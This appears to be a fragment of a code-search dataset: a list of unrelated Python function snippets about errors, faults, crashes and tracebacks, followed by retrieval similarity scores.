"def emergency_recover_states_from_failure():\n _emergency_state_check()\n _emergency_iobuf_extract()",
"def exc_info(self):\n ei = self._exc_info\n if ei is not None and ei[0] is not None:\n return (\n ei[0],\n ei[1],\n # The pickled traceback may be None if we couldn't pickle it.\n load_traceback(ei[2]) if ei[2] else None\n )",
"def exception_stacktrace(self):\n # type: () -> list[string_types]\n return self._exception_stacktrace",
"def get_crash_events_data(self, tc_name):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)",
"def issues(self) -> List[IssueType]:\n return [IssueType.FREE_SPACE]",
"def get_internal_errors(self) -> Dict[str, int]:\n self.serial.write(b\"D!\")\n values = self.__read_response(4)\n first_address_byte_errors = self.__extract_int(values[0], b\"!E1\")\n command_byte_errors = self.__extract_int(values[1], b\"!E2\")\n second_address_byte_errors = self.__extract_int(values[2], b\"!E3\")\n PEC_byte_errors = self.__extract_int(values[3], b\"!E4\")\n\n return {\n \"first_address_byte_errors\": first_address_byte_errors,\n \"command_byte_errors\": command_byte_errors,\n \"second_address_byte_errors\": second_address_byte_errors,\n \"PEC_byte_errors\": PEC_byte_errors,\n }",
"def error(self) -> list:\n return self.__err",
"def getCurrentSystemFunds(self):\n e = self.myParent.myEmpireDict\n d = self.myParent.mySystemDict\n return [e['CR'], d['AL'],d['EC'],d['IA']]",
"def getTraceback(self):\n self.mostLikelyPath = zeros((1, self.T+2))\n\n self.mostLikelyPath[0,0] = 0\n self.mostLikelyPath[0,-1] = self.noOfEmmittingStates+1\n\n for s in range(self.T, 0, -1):\n self.mostLikelyPath[0,s] = self.traceback[self.mostLikelyPath[0,s+1]-1, s]",
"def getCrashDumps(self):\r\n\r\n if len(core.FW_conf['connection']._getCrashDumps()):\r\n return True\r\n else:\r\n return False",
"def get_fault_index(self, device_type_name, fault_name, channel_number):\n if device_type_name in [\"SOLN\", \"BEND\", \"PBLM\", \"CBLM\", \"LBLM\", \"BLEN\", \"BLM\", \"KICK\"]:\n # For SOLN devices type, the fault name is \"Ix\",\n # where x is the integration channel\n integration_channel = int(fault_name[-1])\n\n if integration_channel not in range(4):\n raise ValueError(\"Function \\\"__get_fault_index(device_type_name={}, fault_name={}, channel_number={})\\\".\\\n Integration channel = {} out of range [0:3]\".format(device_type_name, fault_name,\n channel_number, integration_channel))\n\n return \"{}{}\".format(channel_number, integration_channel)\n else:\n # For other application, the get index from the following 2-D dict\n bpm_fault_index = { \"X\":\"0\", \"Y\":\"1\", \"TMIT\":\"2\" }\n bcm_fault_index = { \"CHARGE\":\"0\", \"DIFF\": \"1\" }\n fault_indexes = { \"BPMS\":bpm_fault_index,\n \"FARC\":bcm_fault_index,\n \"TORO\":bcm_fault_index }\n return fault_indexes[device_type_name][fault_name]",
"def get_unbroken_instances(self):\n return self._get_cond_instance(cond=0)",
"def find_backtrace(self):\n return [ft for ft in os.listdir(self.output_dir)\n if os.path.isfile(ft) and ft.startswith(\"Backtrace.\")]",
"def getFatalErrors(self):\n global hadFatalErrors\n if hadFatalErrors:\n text = '\\n'.join(hadFatalErrors)\n hadFatalErrors = []\n return text",
"def problems(self):\n return self.configuration.problems",
"def refined_errors(self):\r\n errs = []\r\n for err in self.errors:\r\n if err['typo'].lower() not in self.terms:\r\n errs.append(err)\r\n return errs",
"def _get_failed_stack_events(stack_name: str, region: str, profile: str = None) -> list:\n logger.debug(f\"getting stack {stack_name} failure events in region {region}\")\n cfn_client = _get_cfn_client(region=region, profile=profile)\n try:\n events = cfn_client.describe_stack_events(StackName=stack_name)\n except Exception as e:\n logger.error(f\"unable to get stack events\")\n logger.error(e)\n raise e\n result = list()\n for event in events['StackEvents']:\n if \"FAILED\" in event['ResourceStatus']:\n result.append(event)\n if len(result) == 0:\n # There were no FAILED events. Look for ROLLBACK_IN_PROGRESS\n for event in events['StackEvents']:\n if \"ROLLBACK_IN_PROGRESS\" in event['ResourceStatus']:\n result.append(event)\n logger.debug(f\"failure events {result}\")\n return result",
"def retrieve_error_messages(self):\n return self.errors_seen[:]",
"def describe_service_errors(StackId=None, InstanceId=None, ServiceErrorIds=None):\n pass",
"def errors(self) -> List[Error]:",
"def _get_resends(self):\n if not self.has_error():\n return []\n\n errors = []\n i = 0\n for item in self.my_json['results']:\n if item.has_key('error') and item['error'] == 'Unavailable':\n errors.append((i, item['error']))\n i += 1\n return errors",
"def traces(self):\n if self._traces is None:\n raise NotImplementedError(\"Weak implementation not supported\")\n else:\n return self._traces",
"def get_errors(self):\n return [result for result in self.values() if result.outcome == Result.ERROR]",
"def checkExceptions(self):\n\n nwarn = 0\n\n icatExceptionType = self.client.factory.create('icatExceptionType')\n schemaexceptions = set(icatExceptionType.__keylist__)\n clientexceptions = set(icat.exception.IcatExceptionTypeMap.keys())\n missing = schemaexceptions - clientexceptions\n if missing:\n log.warning(\"missing exception types: %s\", list(missing))\n nwarn += 1\n\n return nwarn",
"def get_error(self) -> List[str]:\n return []",
"def get_error(self) -> List[str]:\n return []",
"def detect_fatal_errors(self):\n for instance in self.all_instances:\n instance.detect_fatal_errors()",
"def GetAll(self):\n return self._errors.copy()",
"def execute(session, files):\n return TopVehicleCrashes.__process(TopVehicleCrashes, session, files)",
"def _get_errors(exc):\n if hasattr(exc, 'message'):\n errors = exc.messages\n else:\n errors = [str(exc)]\n return errors",
"def means_missing(self):\n return self.fault_code in (32, 33)",
"def display_minutni_fault_info(self, fault):\r\n args = {'id':self.minutniId,\r\n 'statusString':fault}\r\n self.emit(QtCore.SIGNAL('get_minutni_fault_info(PyQt_PyObject)'), args)",
"def GetExpectedCrashes(self, args: ct.TestArgs) -> None:\n # args[0] is the PixelTestPage for the current test.\n return args[0].expected_per_process_crashes",
"def freak():\n with settings(hide('everything'), warn_only=True):\n result = []\n try:\n check = sudo('lsof | grep DEL | grep -e crypto -e libssl')\n if check.return_code == 1:\n result = 'OK'\n logging.warning(\"%s: %s\" % (env.host, result))\n else:\n services = check.split('\\r')\n for service in services:\n service_name = service.split()[0]\n result.append(service_name)\n result = list(set(result))\n print(\"%s: VULNERABLE: %s\" % (env.host, ' '.join(result)))\n logging.warning(\"%s: VULNERABLE: %s\" % (env.host,\n ' '.join(result)))\n except Exception as e:\n logging.warning('%s: Error: %s' % (env.host, e.message))",
"def errorbars (self):\n return self._errorbars",
"def get_fault_type_label(self, cavity_number):\n # Make sure we received a valid cavity number\n self.assert_valid_cavity_number(cavity_number)\n\n # Load fault type model and make a prediction on the current example's features\n fault_idx, fault_confidence = self.make_prediction(self.fault_onnx_session)\n\n # Get the fault name and probability associated with that index\n fault_names = [\"Quench_100ms\", \"Quench_3ms\", \"E_Quench\", \"Heat Riser Choke\", \"Microphonics\", \"Controls Fault\",\n \"Single Cav Turn off\"]\n fault_name = fault_names[fault_idx]\n\n return {'fault-label': fault_name, 'fault-confidence': fault_confidence}",
"def getFailedJobs(self):\n return self.__failedJobs",
"def getErrorsList(self):\n return self.__errors",
"def get_sysfds(self):\n return [self._ptr.contents.sysfds[i] for i in range(RUSS_CONN_NSYSFDS)]",
"def get_aborted_actions(self):\n return self.failed",
"def get_traceback(self, i):\n (_, (_, _, tb)) = self.get_exception()\n\n while i and tb.tb_next:\n tb = tb.tb_next\n i -= 1\n\n return tb",
"def get_spitfp_error_count(self):\n return GetSPITFPErrorCount(*self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_GET_SPITFP_ERROR_COUNT, (), '', 'I I I I'))",
"def dependency_rolls(self):\n return self._dependency_analyzer.GetDependencyRolls(\n [self.stacktrace.crash_stack] if self.stacktrace else [])",
"def all_errata(self):\n return self._all_errata",
"def getSyscallHooks(self):\n return None",
"def getErrorTableIndex(self, *args):\n return _libsbml.FbcExtension_getErrorTableIndex(self, *args)",
"def traceback(self):",
"def errors_fatal(self) -> List[Error]:\n return self._errors_fatal_files + self._errors_fatal"
] | [
"0.82058364",
"0.7297142",
"0.6973599",
"0.62839913",
"0.6117404",
"0.5914989",
"0.585911",
"0.5828832",
"0.56888837",
"0.5640751",
"0.5596669",
"0.55570495",
"0.5398989",
"0.5372518",
"0.5344608",
"0.5326614",
"0.52823734",
"0.525599",
"0.5215235",
"0.5206905",
"0.51792276",
"0.51715744",
"0.51645386",
"0.5153811",
"0.51442236",
"0.5125883",
"0.5123245",
"0.5093789",
"0.50876576",
"0.50817794",
"0.5032068",
"0.5025616",
"0.4981695",
"0.4981695",
"0.4980397",
"0.49771124",
"0.49738127",
"0.49723223",
"0.4921869",
"0.4915626",
"0.4901078",
"0.48889944",
"0.48836654",
"0.48517585",
"0.4849374",
"0.48324996",
"0.48176455",
"0.4802844",
"0.47814584",
"0.4777862",
"0.47610652",
"0.47609344",
"0.47511852",
"0.4740264",
"0.4733746",
"0.47331813",
"0.47296825",
"0.47276458",
"0.47261629",
"0.4720682",
"0.47180402",
"0.4714924",
"0.47041366",
"0.47032252",
"0.46961823",
"0.4691959",
"0.46909627",
"0.46824005",
"0.4668972",
"0.46686617",
"0.46554092",
"0.46504578",
"0.46438566",
"0.4634459",
"0.46245202",
"0.46169472",
"0.46156654",
"0.46156654",
"0.46139967",
"0.46054542",
"0.46039313",
"0.46025866",
"0.45971525",
"0.4595424",
"0.4589683",
"0.45861518",
"0.4584958",
"0.4583668",
"0.45823526",
"0.4578836",
"0.4576294",
"0.45666933",
"0.45558944",
"0.45450717",
"0.45297772",
"0.4518949",
"0.45095977",
"0.4505974",
"0.45040157",
"0.44922727"
] | 0.6233432 | 4 |
This will get the current faults on the system. | def get_faults_current(self):
request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_ACTIVE], BP_TOOL.REQUEST_16)
return self.__get_faults_list(self.config_16.faults_current) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def faults(self):\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n faults = \" \"\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,bits = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n else:\n fault_names = {0:\"Tank Level Low\",2:\"Temperature above alarm range\",\n 4:\"RTD Fault\",5:\"Pump Fault\",7:\"Temperature below alarm range\"}\n faults = \"\"\n for i in range(0,8):\n if (bits >> i) & 1:\n if i in fault_names: faults += fault_names[i]+\", \"\n else: faults += str(i)+\", \"\n faults = faults.strip(\", \")\n if faults == \"\": faults = \"none\"\n debug(\"Faults %s\" % faults)\n return faults",
"def get_faults_latched(self):\n request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_LATCHED], BP_TOOL.REQUEST_16)\n return self.__get_faults_list(self.config_16.faults_latched)",
"def fault_counters(self):\n done, data = self._request('GF')\n if done:\n return {\n 'GFI self test': int(data[0], 16),\n 'Ground': int(data[1], 16),\n 'Stuck relay': int(data[2], 16)\n }\n\n raise EvseError",
"def __get_faults_list(self, faults):\n r_faults = []\n for x in faults:\n if faults[x]['value']:\n r_faults.append(faults[x]['name'])\n return r_faults",
"def _extend_fault_map(self):\n faults.FAULT_MAP.update({nsx_lib_exc.ManagerError:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.ServiceClusterUnavailable:\n webob.exc.HTTPServiceUnavailable,\n nsx_lib_exc.ClientCertificateNotTrusted:\n webob.exc.HTTPBadRequest,\n nsx_exc.SecurityGroupMaximumCapacityReached:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.NsxLibInvalidInput:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxENSPortSecurity:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxPluginTemporaryError:\n webob.exc.HTTPServiceUnavailable\n })",
"def fault():\n return FaultCohesiveKin()",
"def get_faults_history(self, epg_dn):\n class_query = ClassQuery('faultRecord')\n class_query.propFilter = 'eq(faultRecord.affected, \"' + epg_dn + '\")'\n return self.moDir.query(class_query)",
"def _isfault(self):\n return self.dp.state()==PyTango.DevState.FAULT",
"def sys_exc_info(self, for_hidden=False):\n return self.gettopframe()._exc_info_unroll(self.space, for_hidden)",
"def fault(self):\n return (self.status == self.STATUS_FAULT)",
"def fault_code(self):\n from numpy import nan\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n fault_code = nan\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,fault_code = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n fault_code = nan\n if fault_code == 2.0**7:\n fault_code = 8\n elif fault_code == 2.0**6:\n fault_code = 7\n elif fault_code == 2.0**5:\n fault_code = 6\n elif fault_code == 2.0**4:\n fault_code = 5\n elif fault_code == 2.0**3:\n fault_code = 4\n elif fault_code == 2.0**2:\n fault_code = 3\n elif fault_code == 2.0**1:\n fault_code = 2\n elif fault_code == 2.0**0:\n fault_code = 1\n elif fault_code == 0:\n fault_code = 0\n else:\n fault_code = -1\n debug(\"Fault code %s\" % fault_code)\n return fault_code",
"def check_page_faults(con, host, warning, critical,perf_data):\n warning = warning or 10\n critical = critical or 30\n data=get_server_status(con)\n\n try:\n page_faults=float(data['extra_info']['page_faults']) \n except:\n # page_faults unsupported on the underlaying system\n return exit_with_general_critical(\"page_faults unsupported on the underlaying system\")\n \n err,delta=maintain_delta([page_faults],host,\"page_faults\")\n if err==0:\n page_faults_ps=delta[1]/delta[0]\n message = \"Page faults : %.2f ps\" % page_faults_ps\n message+=performance_data(perf_data,[(\"%.2f\" %page_faults_ps,\"page_faults_ps\",warning,critical)])\n return check_levels(page_faults_ps,warning,critical,message)\n else:\n return exit_with_general_warning(\"problem reading data from temp file\")",
"def read_fault(filename):\n\n fault_x = []\n fault_y = []\n fault_file = open(filename)\n\n for segment in fault_file:\n x, y = segment.split()\n fault_x.append(float(x))\n fault_y.append(float(y))\n\n fault_file.close()\n\n return fault_x, fault_y",
"def _GetAbortRequests(self):\n new_requests = self._GetRequestsByState(self._ABORTING)\n for request_id in new_requests:\n logging.info('Abort requested for %s', request_id)\n self._ClearRequest(request_id, self._ABORTING)\n return new_requests",
"def __get_fault(self, mps_db_session, fault_id):\n fault = mps_db_session.query(models.Fault).filter(models.Fault.id==fault_id).all()\n\n if len(fault) == 1:\n return fault[0]\n elif len(fault) == 0:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). Not fault was found.\\\"\"\n .format(fault_id))\n else:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). More than one fault matches\\\"\"\n .format(fault_id))",
"def as_fault(self):\n return Fault(self.fault_code, self.internal_message or\n 'unknown server error')",
"def page_fault(self):\n self._page_fault += 1",
"def pageFault(proc):\n\n global pfList\n pfList.append([proc, 1])",
"def get_diagnostics(self) -> List[Diagnostic]:\n raise NotImplementedError",
"def get_unexpected_reboots(self):\n\n _, remaining_bootups = self.get_unmatched_events(\n event_cause_label=\"basic.reboot_trigger\",\n event_effect_label=\"basic.bootup\")\n\n return remaining_bootups",
"def remote_getStatus(self):\n zep = getFacade('zep')\n issues = zep.getDeviceIssues(eventClass=[Status_Mail],\n severity=[SEVERITY_WARNING, SEVERITY_ERROR, SEVERITY_CRITICAL])\n return [d\n for d, count, total in issues\n if getattr(self.config.devices, d, None)]",
"def faulty(self, *args):\n for each in args:\n if not self.is_faulty(each):\n self._faults.add(each)",
"def panic_on_fault_enabled(self):\n # The panic_on_fault mechanism might not even be included in the build\n # (in which case the panic_on_fault variables won't exist), so be defensive.\n try:\n enabled = self.chipdata.get_var_strict(\n 'L_panic_on_fault_enabled'\n ).value\n fault_id = self.chipdata.get_var_strict(\n 'L_panic_on_fault_id'\n ).value\n except ct.DebugInfoNoVariable:\n enabled = False\n fault_id = 0\n return (enabled, fault_id)",
"def errors_fatal(self) -> List[Error]:",
"def cpu_halt_reasons(self):\n buf_size = self.MAX_NUM_MOES\n buf = (structs.JLinkMOEInfo * buf_size)()\n num_reasons = self._dll.JLINKARM_GetMOEs(buf, buf_size)\n if num_reasons < 0:\n raise errors.JLinkException(num_reasons)\n\n return list(buf)[:num_reasons]",
"def is_faulty(self, event):\n for each in self._faults:\n if each.name.upper() == event.name.upper():\n return True\n return False",
"def exechost_status():\n\n exechost = socket.gethostname()\n\n # free\n try:\n subp = subprocess.Popen([\"free\", \"-m\"], stdout=subprocess.PIPE)\n output = subp.communicate()[0]\n print \"EXECSTAT %s FREE\\n%s\" % (exechost, output)\n except:\n print \"Problem running free command\"\n (extype, exvalue, trback) = sys.exc_info()\n traceback.print_exception(extype, exvalue, trback, limit=1, file=sys.stdout)\n print \"Ignoring error and continuing...\\n\"\n\n # df\n try:\n cwd = os.getcwd()\n subp = subprocess.Popen([\"df\", \"-h\", cwd], stdout=subprocess.PIPE)\n output = subp.communicate()[0]\n print \"EXECSTAT %s DF\\n%s\" % (exechost, output)\n except:\n print \"Problem running df command\"\n (extype, exvalue, trback) = sys.exc_info()\n traceback.print_exception(extype, exvalue, trback, limit=1, file=sys.stdout)\n print \"Ignoring error and continuing...\\n\"",
"def threat_exceptions(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"threat_exceptions\")",
"def fault_summary(request, accountId):\n if not accountId or len(accountId) == 0:\n return JSONResponse('No input parameter account_id.', status=400)\n\n token = query.getZabbixToken()\n print token\n if not token:\n LOG.exception('failed to query zabbix for token.')\n return JSONResponse('Failed to query zabbix for token.', status=500)\n\n data = query.getServiceState(accountId, token)\n print data\n if data == None:\n LOG.exception('failed to query zabbix for service state.')\n return JSONResponse('Failed to query zabbix for service state.', status=500)\n\n serviceData = normalizeServiceState(data)\n print serviceData\n result = {'service_state': {\n 'account_id': accountId,\n 'account_name': serviceData[0],\n 'hosts': serviceData[1]\n }}\n return JSONResponse(result)",
"def check_errors(self):\n\n errors = []\n while True:\n err = self.values(\"SYST:ERR?\")\n if int(err[0]) != 0:\n errmsg = \"Agilent 5313xA: {0}: {1}\".format(err[0], err[1])\n log.error(errmsg + '\\n')\n errors.append(errmsg)\n else:\n break\n\n return errors",
"def getExceptions(self):\n return self.getOrDefault(\"exceptions\")",
"def __exc_info(self):\n exctype, excvalue, tb = sys.exc_info()\n if sys.platform[:4] == 'java': ## tracebacks look different in Jython\n return (exctype, excvalue, tb)\n return (exctype, excvalue, tb)",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def termination_status(self):\n res = {}\n for i in range(len(self)):\n res[i] = self.kernels[i].stop()\n return res",
"def exc_info(self):\n return self._exc_info",
"def geterr():\n return __errprof.state.copy()",
"def check_errors(self) -> None:\n # TODO check the manual for error codes & interpert them.\n return self.send(self.cmd.GET_GLOBALSTATUS_CURRENTERROR)",
"def clear_faults(self, session, params):\n\n session.set_status('running')\n yield self.acu_control.clear_faults()\n session.set_status('stopping')\n return True, 'Job completed.'",
"def get_number_of_crashes(result_info):\n assert isinstance(result_info, dict)\n # FIXME: We can't use analyse.get_generic_run_outcomes()\n # because we can't distinguish between a crash and an out\n # of memory situation properly\n #reports = analyse.get_generic_run_outcomes(result_info)\n is_merged_result = analyse.raw_result_info_is_merged(result_info)\n non_zero_exit_code_count = 0 # Only counted if it wasn't an out of memory run\n out_of_memory_count = 0\n if is_merged_result:\n assert isinstance(result_info['out_of_memory'], list)\n assert isinstance(result_info['exit_code'], list)\n assert len(result_info['out_of_memory']) == len(result_info['exit_code'])\n for index, oom in enumerate(result_info['out_of_memory']):\n corresponding_exit_code = result_info['exit_code'][index]\n if oom is True:\n out_of_memory_count += 1\n elif corresponding_exit_code is not None and corresponding_exit_code != 0:\n non_zero_exit_code_count += 1\n else:\n if result_info['out_of_memory'] is True:\n out_of_memory_count += 1\n elif result_info['exit_code'] is not None and result_info['exit_code'] != 0:\n non_zero_exit_code_count += 1\n return non_zero_exit_code_count + out_of_memory_count",
"def get_fault_info(filenames=['disk_sample_fault_tag.csv', 'disk_sample_fault_tag_201808.csv']):\n fault_df1 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[0]))\n fault_df2 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[1]))\n fault_df2.drop(['key'], axis=1,inplace=True)\n fault_tag_df = pd.concat([fault_df1, fault_df2], ignore_index=True)\n fault_dic = {}\n \n for _, row in fault_tag_df.iterrows():\n f_time = row[\"fault_time\"]\n tag = row[\"tag\"]\n key = tuple([row[\"manufacturer\"], row[\"model\"], row[\"serial_number\"]])\n if key not in fault_dic.keys():\n sub_dic = {}\n sub_dic[\"date\"] = f_time\n sub_dic[\"tag\"] = tag\n fault_dic[key] = sub_dic\n return fault_dic",
"def GetLongLineExceptions(self):\n return []",
"def diagnostic_trouble_codes(self):\n return self._diagnostic_trouble_codes",
"def get_exception_trap():\n return CRDS_EXCEPTION_TRAP",
"def get_crashing_anomaly_ids(self):\n\n crashing_anomalies = []\n\n for anomaly_id in self.get_anomaly_ids():\n if self.get_anomaly_error(anomaly_id) is not None:\n crashing_anomalies.append(anomaly_id)\n\n return crashing_anomalies",
"def GetFailures(self):\n return self._compute_client.all_failures",
"def server_fault(e):\n return \"Something went wrong, and it is our fault. Try reloading the page.\"",
"def dependencies(self):\n return self._dependency_analyzer.GetDependencies(\n [self.stacktrace.crash_stack] if self.stacktrace else [])",
"def trace(context=1):\r\n return getinnerframes(sys.exc_info()[2], context)",
"def Errcheck(self) -> list:\n\n myError = []\n\n ErrorList = self.myFieldFox.query(\"SYST:ERR?\").split(',')\n\n Error = ErrorList[0]\n\n if int(Error) == 0:\n\n print (\"+0, No Error!\")\n\n else:\n\n while int(Error)!=0:\n\n print (\"Error #: \" + ErrorList[0])\n\n print (\"Error Description: \" + ErrorList[1])\n\n myError.append(ErrorList[0])\n\n myError.append(ErrorList[1])\n\n ErrorList = self.myFieldFox.query(\"SYST:ERR?\").split(',')\n\n Error = ErrorList[0]\n\n myError = list(myError)\n\n return myError",
"def get_fatal_alerts(self, path):",
"def get_resources():\n # Acquire the lock...\n get_resources_lock.acquire()\n\n # ...but always release it\n try:\n # Construct the dictionaries as copies from nanny\n (limits,usage) = nanny.get_resource_information()\n\n\n # Calculate all the usage's\n pid = os.getpid()\n\n # Get CPU and memory, this is thread specific\n if ostype in [\"Linux\", \"Darwin\"]:\n \n # Get CPU first, then memory\n usage[\"cpu\"] = os_api.get_process_cpu_time(pid)\n\n # This uses the cached PID data from the CPU check\n usage[\"memory\"] = os_api.get_process_rss()\n\n # Get the thread specific CPU usage\n usage[\"threadcpu\"] = os_api.get_current_thread_cpu_time() \n\n\n # Windows Specific versions\n elif ostype in [\"Windows\"]:\n \n # Get the CPU time\n usage[\"cpu\"] = windows_api.get_process_cpu_time(pid)\n\n # Get the memory, use the resident set size\n usage[\"memory\"] = windows_api.process_memory_info(pid)['WorkingSetSize'] \n\n # Get thread-level CPU \n usage[\"threadcpu\"] = windows_api.get_current_thread_cpu_time()\n\n # Unknown OS\n else:\n raise EnvironmentError(\"Unsupported Platform!\")\n\n # Use the cached disk used amount\n usage[\"diskused\"] = cached_disk_used\n\n finally:\n # Release the lock\n get_resources_lock.release()\n\n # Copy the stop times\n stoptimes = process_stopped_timeline[:]\n\n # Return the dictionaries and the stoptimes\n return (limits,usage,stoptimes)",
"def emergency_recover_states_from_failure():\n _emergency_state_check()\n _emergency_iobuf_extract()",
"def exc_info(self):\n ei = self._exc_info\n if ei is not None and ei[0] is not None:\n return (\n ei[0],\n ei[1],\n # The pickled traceback may be None if we couldn't pickle it.\n load_traceback(ei[2]) if ei[2] else None\n )",
"def exception_stacktrace(self):\n # type: () -> list[string_types]\n return self._exception_stacktrace",
"def get_crash_events_data(self, tc_name):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)",
"def issues(self) -> List[IssueType]:\n return [IssueType.FREE_SPACE]",
"def get_internal_errors(self) -> Dict[str, int]:\n self.serial.write(b\"D!\")\n values = self.__read_response(4)\n first_address_byte_errors = self.__extract_int(values[0], b\"!E1\")\n command_byte_errors = self.__extract_int(values[1], b\"!E2\")\n second_address_byte_errors = self.__extract_int(values[2], b\"!E3\")\n PEC_byte_errors = self.__extract_int(values[3], b\"!E4\")\n\n return {\n \"first_address_byte_errors\": first_address_byte_errors,\n \"command_byte_errors\": command_byte_errors,\n \"second_address_byte_errors\": second_address_byte_errors,\n \"PEC_byte_errors\": PEC_byte_errors,\n }",
"def error(self) -> list:\n return self.__err",
"def getCurrentSystemFunds(self):\n e = self.myParent.myEmpireDict\n d = self.myParent.mySystemDict\n return [e['CR'], d['AL'],d['EC'],d['IA']]",
"def getTraceback(self):\n self.mostLikelyPath = zeros((1, self.T+2))\n\n self.mostLikelyPath[0,0] = 0\n self.mostLikelyPath[0,-1] = self.noOfEmmittingStates+1\n\n for s in range(self.T, 0, -1):\n self.mostLikelyPath[0,s] = self.traceback[self.mostLikelyPath[0,s+1]-1, s]",
"def getCrashDumps(self):\r\n\r\n if len(core.FW_conf['connection']._getCrashDumps()):\r\n return True\r\n else:\r\n return False",
"def get_fault_index(self, device_type_name, fault_name, channel_number):\n if device_type_name in [\"SOLN\", \"BEND\", \"PBLM\", \"CBLM\", \"LBLM\", \"BLEN\", \"BLM\", \"KICK\"]:\n # For SOLN devices type, the fault name is \"Ix\",\n # where x is the integration channel\n integration_channel = int(fault_name[-1])\n\n if integration_channel not in range(4):\n raise ValueError(\"Function \\\"__get_fault_index(device_type_name={}, fault_name={}, channel_number={})\\\".\\\n Integration channel = {} out of range [0:3]\".format(device_type_name, fault_name,\n channel_number, integration_channel))\n\n return \"{}{}\".format(channel_number, integration_channel)\n else:\n # For other application, the get index from the following 2-D dict\n bpm_fault_index = { \"X\":\"0\", \"Y\":\"1\", \"TMIT\":\"2\" }\n bcm_fault_index = { \"CHARGE\":\"0\", \"DIFF\": \"1\" }\n fault_indexes = { \"BPMS\":bpm_fault_index,\n \"FARC\":bcm_fault_index,\n \"TORO\":bcm_fault_index }\n return fault_indexes[device_type_name][fault_name]",
"def get_unbroken_instances(self):\n return self._get_cond_instance(cond=0)",
"def find_backtrace(self):\n return [ft for ft in os.listdir(self.output_dir)\n if os.path.isfile(ft) and ft.startswith(\"Backtrace.\")]",
"def getFatalErrors(self):\n global hadFatalErrors\n if hadFatalErrors:\n text = '\\n'.join(hadFatalErrors)\n hadFatalErrors = []\n return text",
"def problems(self):\n return self.configuration.problems",
"def refined_errors(self):\r\n errs = []\r\n for err in self.errors:\r\n if err['typo'].lower() not in self.terms:\r\n errs.append(err)\r\n return errs",
"def _get_failed_stack_events(stack_name: str, region: str, profile: str = None) -> list:\n logger.debug(f\"getting stack {stack_name} failure events in region {region}\")\n cfn_client = _get_cfn_client(region=region, profile=profile)\n try:\n events = cfn_client.describe_stack_events(StackName=stack_name)\n except Exception as e:\n logger.error(f\"unable to get stack events\")\n logger.error(e)\n raise e\n result = list()\n for event in events['StackEvents']:\n if \"FAILED\" in event['ResourceStatus']:\n result.append(event)\n if len(result) == 0:\n # There were no FAILED events. Look for ROLLBACK_IN_PROGRESS\n for event in events['StackEvents']:\n if \"ROLLBACK_IN_PROGRESS\" in event['ResourceStatus']:\n result.append(event)\n logger.debug(f\"failure events {result}\")\n return result",
"def retrieve_error_messages(self):\n return self.errors_seen[:]",
"def describe_service_errors(StackId=None, InstanceId=None, ServiceErrorIds=None):\n pass",
"def errors(self) -> List[Error]:",
"def _get_resends(self):\n if not self.has_error():\n return []\n\n errors = []\n i = 0\n for item in self.my_json['results']:\n if item.has_key('error') and item['error'] == 'Unavailable':\n errors.append((i, item['error']))\n i += 1\n return errors",
"def traces(self):\n if self._traces is None:\n raise NotImplementedError(\"Weak implementation not supported\")\n else:\n return self._traces",
"def get_errors(self):\n return [result for result in self.values() if result.outcome == Result.ERROR]",
"def checkExceptions(self):\n\n nwarn = 0\n\n icatExceptionType = self.client.factory.create('icatExceptionType')\n schemaexceptions = set(icatExceptionType.__keylist__)\n clientexceptions = set(icat.exception.IcatExceptionTypeMap.keys())\n missing = schemaexceptions - clientexceptions\n if missing:\n log.warning(\"missing exception types: %s\", list(missing))\n nwarn += 1\n\n return nwarn",
"def get_error(self) -> List[str]:\n return []",
"def get_error(self) -> List[str]:\n return []",
"def detect_fatal_errors(self):\n for instance in self.all_instances:\n instance.detect_fatal_errors()",
"def GetAll(self):\n return self._errors.copy()",
"def execute(session, files):\n return TopVehicleCrashes.__process(TopVehicleCrashes, session, files)",
"def _get_errors(exc):\n if hasattr(exc, 'message'):\n errors = exc.messages\n else:\n errors = [str(exc)]\n return errors",
"def means_missing(self):\n return self.fault_code in (32, 33)",
"def display_minutni_fault_info(self, fault):\r\n args = {'id':self.minutniId,\r\n 'statusString':fault}\r\n self.emit(QtCore.SIGNAL('get_minutni_fault_info(PyQt_PyObject)'), args)",
"def GetExpectedCrashes(self, args: ct.TestArgs) -> None:\n # args[0] is the PixelTestPage for the current test.\n return args[0].expected_per_process_crashes",
